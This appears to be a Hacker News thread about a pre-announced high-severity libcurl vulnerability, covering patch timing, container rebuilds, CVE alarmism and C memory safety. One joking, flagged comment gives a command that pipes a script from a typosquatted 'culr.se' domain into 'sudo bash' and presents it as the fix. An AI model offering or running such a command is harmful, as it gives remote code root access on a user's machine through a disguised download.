> Updating the shared libcurl library should be enough to fix this issue on all operating systems.
> Then again there will also be countless docker (and similar) images that feature their own copies, so there will still be quite a large number of rebuilds necessary I bet.
Quite a large number, yeah.
I kinda hate doing things this way...
Could it be better not to just come out with somewhat alarmist take that hey we are going to release high risk vulnerability in week... And fixes to that...
But instead just release new version and CVE at same time? Now is everyone trying to get ready to exploit this on 11th, or already getting most out of it if they know? And does this information really make anyone to hover their finger on button to push new versions and so on on 11th?
Sad to see this just a month and a half from this post: https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-eve...
Is the CVE system unreasonably alarmistic or is C unpredictable with flaws?
C software really needs to be used in a sandbox because this stuff is inevitable.
Relevant XKCD: https://xkcd.com/2347/
(Just switch Nebraska with Stockholm)
Also consider throwing a buck or two curl's way: https://curl.se/donation.html
Place your bets: a) logic bug b) memory bug (buffer overrun/use after free/etc) c) other
The race has begun. Although Iād be surprised if it was an easy one to figure out given curls status
Ah, the fix is out!
curl https://culr.se/cve-fix | sudo bash
[flagged]
Ouch! Percentage of internet of things devices who don't ship libcurl is a rounding error. Percentage of internet of things devices that patch libcurl is also a rounding error.